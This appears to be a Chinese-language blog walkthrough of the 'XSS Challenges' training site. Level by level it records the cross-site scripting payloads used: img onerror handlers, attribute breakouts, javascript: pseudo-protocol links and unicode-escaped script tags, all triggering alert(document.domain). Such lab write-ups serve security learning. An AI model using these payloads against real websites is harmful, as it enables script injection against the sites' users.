XSS Challenges

1.

没有过滤

<img src=1 one rror=alert(document.domain)>

XSS Challenges

2.

输入第一关的payload

查看源码

XSS Challenges

"><img src=1 one rror=alert(document.domain)>

XSS Challenges

3.

发现字符被转义

XSS Challenges

抓包,发现有两个参数

XSS Challenges

修改第二个参数

XSS Challenges

4.

抓包发现有三个参数

XSS Challenges

修改第三个参数

XSS Challenges

发现还是没有弹窗,查看源码

XSS Challenges

修改第三个参数

XSS Challenges

5.

发现限制了输入框的长度

XSS Challenges

查看元素,修改长度

XSS Challenges

6.

XSS Challenges

发现没有过滤引号,但是尖括号被HTML实体转义了

使用事件触发XSS

XSS Challenges

7.

XSS Challenges

没有引号,使用事件

XSS Challenges

8.

XSS Challenges

href 可以使用伪协议,然后点击

javascript:alert(document.domain)

10.

发现domain被过滤了

XSS ChallengesXSS Challenges

11.

XSS Challenges

过滤了事件

XSS Challenges

<script>标签也不行

想到还可以使用javascript伪协议

XSS Challenges

发现s还是有问题,于是先编码试试

"><a href=javascript:alert(document.domain)>1</a>

12.

去网上找了找大佬们写的,发现使用`,在IE下解析成引号

XSS Challenges

15.

dom型

输入<img src=1 one rror=alert(1)>

发现过滤了<>输入在<script>标签中,使用编码

\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003ealert(document.domain)\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e

输入之后\都被过滤了

\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e

16.

\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e
 
上一篇:【读书笔记】排列研究-模式避免-基础Pattern Avoidance


下一篇:poj2262 Goldbach's Conjecture